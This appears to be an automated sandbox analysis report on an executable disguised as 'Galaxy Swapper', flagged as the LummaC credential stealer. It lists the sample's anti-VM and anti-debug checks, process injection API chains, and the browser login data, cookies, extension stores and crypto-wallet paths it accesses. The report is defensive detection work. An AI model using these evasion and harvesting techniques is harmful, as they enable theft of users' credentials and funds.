Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Galaxy Swapper v2.0.3.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F3711A push ecx; ret	0_2_00F3712D
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0045084B push ebp; iretd	1_2_0045085A
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00455288 push ss; ret	1_2_0045529B
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00452B30 push esp; iretd	1_2_00452B34
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0045045E push ss; retf	1_2_0045045F
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_004435AA push edx; iretd	1_2_004435B5
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F3711A push ecx; ret	1_2_00F3712D

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Window / User API: threadDelayed 6098

Jump to behavior

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe TID: 6760	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe TID: 5304	Thread sleep count: 6098 > 30			Jump to behavior

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F48ECE FindFirstFileExW,	0_2_00F48ECE
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F48F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00F48F7F
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F48ECE FindFirstFileExW,	1_2_00F48ECE
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F48F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00F48F7F

Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1043714845.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000002.2173877102.000000000144C000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000002.2174352333.000000000148C000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1072728256.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1126504400.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1754952963.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1045404124.0000000001488000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985785942.0000000003D1B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.985892319.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

API call chain: ExitProcess graph end node

graph_1-41712

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Code function: 1_2_0044A6F0 LdrInitializeThunk,

1_2_0044A6F0

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Code function: 0_2_00F36DE8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00F36DE8

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Code function: 0_2_00F5F1B4 mov edi, dword ptr fs:[00000030h]

0_2_00F5F1B4

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Code function: 0_2_00F4490C GetProcessHeap,

0_2_00F4490C

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F36A2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00F36A2C
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F36DE8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F36DE8
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F36DDC SetUnhandledExceptionFilter,	0_2_00F36DDC
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F3EF1E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F3EF1E
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F36A2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00F36A2C
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F36DE8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00F36DE8
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F36DDC SetUnhandledExceptionFilter,	1_2_00F36DDC
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F3EF1E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00F3EF1E

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Code function: 0_2_00F5F1B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_00F5F1B4

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Memory written: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Process created: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe "C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: GetLocaleInfoW,	0_2_00F488F6
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: EnumSystemLocalesW,	0_2_00F488AB
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: EnumSystemLocalesW,	0_2_00F441F7
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00F4899D
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: GetLocaleInfoW,	0_2_00F48AA3
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00F48238
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: GetLocaleInfoW,	0_2_00F43CFC
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: EnumSystemLocalesW,	0_2_00F48489
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00F48524
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: GetLocaleInfoW,	0_2_00F487D6
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: EnumSystemLocalesW,	0_2_00F48777
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: GetLocaleInfoW,	1_2_00F488F6
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: EnumSystemLocalesW,	1_2_00F488AB
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: EnumSystemLocalesW,	1_2_00F441F7
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_00F4899D
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: GetLocaleInfoW,	1_2_00F48AA3
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_00F48238
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: GetLocaleInfoW,	1_2_00F43CFC
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: EnumSystemLocalesW,	1_2_00F48489
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_00F48524
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: GetLocaleInfoW,	1_2_00F487D6
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: EnumSystemLocalesW,	1_2_00F48777

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Code function: 0_2_00F37827 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00F37827

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1073107424.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1076880607.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1072728256.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1072728256.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1072728256.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1126504400.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1072728256.000000000147C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1095849141.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1126897158.00000000014F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fender\MsMpeng.exe

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Galaxy Swapper v2.0.3.exe PID: 6516, type: MEMORYSTR
Source: Yara match	File source: 1.2.Galaxy Swapper v2.0.3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Galaxy Swapper v2.0.3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2172856527.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.916483923.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1045404124.00000000014B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1043714845.0000000001488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1043714845.000000000147C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1126504400.0000000001463000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1045404124.00000000014B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1043714845.000000000147C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1043714845.0000000001488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1043660999.00000000014E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1043714845.000000000145A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
